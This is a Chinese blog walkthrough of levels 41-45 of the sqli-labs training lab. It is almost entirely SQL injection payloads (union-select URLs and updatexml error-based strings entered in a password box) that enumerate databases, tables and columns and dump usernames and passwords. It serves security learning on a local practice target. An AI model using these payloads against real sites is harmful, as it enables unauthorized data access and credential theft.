sql-labs41-45关通关攻略

已于 2024-08-28 17:35:27 修改
阅读量483 收藏 20
点赞数 8
文章标签: sql 数据库 mysql
于 2024-08-28 13:26:15 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_75036923/article/details/141638390
版权

第41关

一.查询数据库

http://127.0.0.1/Less-41/?id=-1%20union%20select%201,2,database()--+icon-default.png?t=N7T8http://127.0.0.1/Less-41/?id=-1%20union%20select%201,2,database()--+

二.查表

http://127.0.0.1/Less-41/?id=-1%20union%20select%201,2,(select%20group_concat(table_name)%20from%20information_schema.tables%20where%20table_schema=database())%20--+icon-default.png?t=N7T8http://127.0.0.1/Less-41/?id=-1%20union%20select%201,2,(select%20group_concat(table_name)%20from%20information_schema.tables%20where%20table_schema=database())%20--+

三.查列

http://127.0.0.1/Less-41/?id=-1%20union%20select%201,2,(select%20group_concat(column_name)%20from%20information_schema.columns%20where%20table_schema=%27security%27%20and%20table_name=%27users%27)--+icon-default.png?t=N7T8http://127.0.0.1/Less-41/?id=-1%20union%20select%201,2,(select%20group_concat(column_name)%20from%20information_schema.columns%20where%20table_schema=%27security%27%20and%20table_name=%27users%27)--+

四.查user表里所有数据

http://127.0.0.1/Less-41/?id=-1%20union%20select%201,2,(select%20group_concat(username,%27~%27,password)%20from%20security.users)--+

第42关

一.登录页面

二.查询数据库

在密码框里输入
'and updatexml(1,concat(~,(select database()),~),1)

三.查表 

在密码框里输入
'and updatexml(1,concat(~,(select group_concat(table_name) from information_schema.tables where table_schema=database() ),~),1) 


 四.查列

在密码框里输入

'and updatexml(1,concat(~,(select group_concat(column_name) from information_schema.columns where table_name='users' ),~),1) 

 第43关

一.登录页面

二. 查询数据库

在密码框里输入
') and updatexml(1,concat(~,(select database()),~),1) 


三.查表名

在密码框里输入
') and updatexml(1,concat(~,(select group_concat(table_name) from information_schema.tables where table_schema=database() ),~),1)


 

四.查列


') and updatexml(1,concat(~,(select group_concat(column_name) from information_schema.columns where table_name='users' ),~),1) 

第44关

一.查询数据库

在密码框中输入

1' union select 1,database(),3 #

二.查表

在密码框中输入1' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='security' #

 

三.查列

在密码框中输入1' union select 1,group_concat(column_name),3 from information_schema.columns where table_name='emails' #

 

第45关

一.查询数据库

在密码框中输入1') union select 1,database(),3 #

二.查表

在密码框中输入1') union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='security' #

三.查列

在密码框中输入1') union select 1,group_concat(column_name),3 from information_schema.columns where table_name='emails' #

一身傲骨@
关注
  • 8
    点赞
  • 20
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
详细sqli-labs(1-65)通关讲解
dreamthe的博客
05-17 14万+
​ 如果刚开始接触sql注入,那么sqli-labs这个靶场会很适合你,里面包含了很多的情景,以及我们在sql注入的时候遇到的阻碍。本章将1-65重点卡进行详细讲解。代码基本上很全。如果靶场练习完了可以看我这篇SQL注入总结会更好掌握。​SQL注入非常详细总结_糊涂是福yyyy的博客-CSDN博客_sql注入数据包 ​...
SQL-Labs靶场“36-37”通关教程
钟言的博客
03-19 3451
本篇为SQL-Labs靶场的36到37通关教程,详细内容包含了:一、36 GET单引号宽字节注入1、源码分析2、联合查询注入3、updatexml报错注入4、floor报错注入37POST单引号宽字节注入1、源码分析2、联合查询注入3、updatexml报错注入4、floor报错注入等内容
SQL-Labs靶场“46-50”通关教程
热门推荐
钟言的博客
02-24 1万+
本篇为SQL-Labs靶场的第46到50教程,详细内容包含了:四十六 ORDER BY数字型注入 1、源码分析 2、rand()盲注 3、if语句盲注 4、时间盲注 5、报错注入 6、Limit注入 四十七 ORDER BY单引号报错注入 1、源码分析 2、报错注入 3、时间盲注 三、四十八 ODRER BY数字型盲注 1、源码分析 2、rand()盲注 3、if语句盲注 4、时间盲注 四、四十九 ORDER BY单引号盲注1、源码分析 2、时间盲注 五、五十 ORDER BY数字型堆叠注等
sql-labs通关
m0_74013288的博客
10-15 247
查库:select schema_name from information_schema. schemata;查表: select table_name from information_schema.tables where table_schema='security';查列:select column_name form information_schema.columns where table_name='users';
sqli-labs 第七 多命通关攻略
两个月亮
01-05 1706
错误输入与不正常输入的返回结果是相同的。该页面的 PHP 代码存在这么一个判断语句,在 SQL 查询结果不为空集时,返回结果为;反之返回。怎么会这样?等等,我们刚刚得出的结论好像被忽略了:该页面的 PHP 代码存在这么一个判断语句,在 SQL 查询结果不为空集时,返回结果为;反之返回。既然返回结果为空都将返回,那我们刚刚构造的判断语句又怎么能够判断出注入类型呢?在遇到读写权限问题后,尝试向搜索引擎寻求帮助,但解决方案大多针对 Linux 操作系统且并不详细,只好自己摸索了。
SQL-Labs靶场“32-33”通关教程
钟言的博客
03-14 5707
本篇为SQL-Labs靶场的第32到33通关教程(宽字节注入),详细内容包含了、32 GET单引号闭合宽字节注入 1、源码分析 2、宽字节注入原理 3、联合查询 4、updatexml报错注入 5、floor报错注入 、33 GET单引号addslashes逃逸注入 1、源码分析 2、联合查询 3、updatexml报错注入 4、floor报错注入等内容
SQL-Labs靶场“34-35”通关教程
钟言的博客
03-18 2566
本篇为SQL-Labs靶场的34到35教程,详细内容包含了:34 POST单引号宽字节注入 1、源码分析 2、联合查询注入 3、updatexml报错注入 4、floor报错注入 35 GET数字型报错注入 1、源码分析 2、联合查询注入 3、updatexml报错注入 4、floor报错注入等内容
SQL-Labs靶场“29-31”通关教程
钟言的博客
02-27 1万+
本篇为SQL-Labs靶场第29-31通关教程,详细内容包含了:一、二十九 基于错误的WAF单引号注入 1、源码分析 2、HTTP参数污染 3、联合查询注入 4、updatexml报错注入 二、三十 基于错误的WAF双引号注入 1、源码分析 2、联合查询注入 3、updatexml报错注入 三、三十一 基于错误的WAF双引号括 1、源码分析 2、联合查询注入 3、updatexml报错注入等等
sql-labs通关教程
m0_62274649的博客
10-30 856
sqllabs搭建
sql-labs通关技巧
03-01
SQL注入领域,`sql-labs` 是一个常用的练习平台,帮助学习者掌握SQL注入技巧。本篇将详细解析如何通过SQL注入攻击不同类型的靶场,以及如何利用自动化工具`sqlmap`进行辅助。 首先,我们需要识别注入点。在`less1...
SQL-labs/less1通关教程
02-29
### SQL-labs/less1通关教程详解 #### 一、理解GET传参方式与SQL注入基础 本节介绍的是如何通过GET方式传递参数来进行SQL注入的基础操作。在Web开发中,GET请求通常用于向服务器发送数据,这些数据会被附加在URL...
史上最详细的sql-labs通关秘籍less1-4
weixin_50644728的博客
11-24 828
到此就完整地过了一遍less1了,总结来说有以下几个步骤:先判断注入类型:是数值型还是字符型,通过测试可知less1为字符型注入(引号包裹id值),闭合单引号判断字段数:用order by测试回显字段:用union select 1,2,3,……获取数据库名:用database()函数获取数据表名:用group_concat(table_name)、information_schema.tables表中的security数据库
SQL-DCL-数据控制语言
DEVIL_hym的博客
08-23 303
一、 DCL-管理用户。二、DCL-权限控制。
一步迅速了解Spring框架
最新发布
ymr1843762281的博客
08-28 220
将程序中的一些公共的非业务代码分离提取出来,然后在业务代码执行的时候,给他们横切进来,使用的动态代理的机制实现,在我们的业务代码,不显示调用,但是执行业务代码,会通过代理对象,调用非业务代码。以前我们在程序中需要对象,都是自己new,例如:new StudentDao对象,Spring 是一个轻量级的,IOC 和 AOP 的一站式 Java 开发框架,是为了简化企。除了核心的IOC和AOP功能之外,还对数据访问层,web层都有封装,所以是一站式的。inversion of Control 控制反转。
mybatis拦截器打印完整带参数sql,可直接放入数据库工具执行
apply_bomb的博客
08-25 345
如果你使用的是mybatisplus,那至少有3种方法打印sql, 如下博客。
[mysql][sql]mysql查询表大小
一名不太专业的程序员
08-21 674
表中选择特定数据库(在这个例子中是名为 'crawleroocllisten' 的数据库)的表信息。查询结果包括数据库名、表名、表中的记录数以及数据和索引所占用的空间容量(单位为MB)。这个查询通常用于数据库管理,帮助管理员了解数据库中各个表的大小和记录数,以便进行优化和维护。函数来将数据和索引长度除以1024两次(将字节转换为MB),并且保留两位小数。SQL 查询语句,用于从。
在spring中发布订阅事件
weixin_47503016的博客
08-28 70
如何在spring中发布订阅事件
SQL】换座位
Frost_Descent的博客
08-28 219
可以再次通过if,使得最后一位同学id不变,if(id=(select count(*) from Seat), id, id+1)这里两个连续的学生换位,即偶数位减一,奇数位加一,不必使用case when等,通过简单的if可以实现。如果学生的数量是奇数,则最后一个学生的id不交换。注意到,前面仅适用于学生总数是偶数的情况,如果学生数量是奇数,最后一位同学座位不变。请注意,如果学生人数为奇数,则不需要更换最后一名学生的座位。该表的每一行都表示学生的姓名和 ID。是该表的主键(唯一值)列。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值